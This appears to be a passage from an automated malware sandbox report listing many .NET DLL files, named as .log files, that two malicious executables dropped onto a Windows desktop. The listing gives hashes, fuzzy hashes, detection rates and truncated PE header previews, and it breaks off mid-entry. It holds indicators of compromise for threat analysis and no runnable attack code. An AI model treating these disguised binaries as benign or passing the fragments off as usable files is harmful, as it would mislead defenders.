                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VxlkbjYv.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WQvQoNyx.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WhRPvofH.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\XOEIXFmQ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\XaOgexda.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\YBagvbJq.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\YHFyVwyQ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\YMBsdaAI.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\YPpRAgYW.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\YWHQgFFn.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\abhXZtjw.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\axOHLXft.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\cCsjkXAC.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\cxwpdtyJ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\dSJhnlvh.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\eCWwWibS.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\eulplymD.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\gHANBhKj.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\gMZpSqzV.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\gUKxCZnk.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
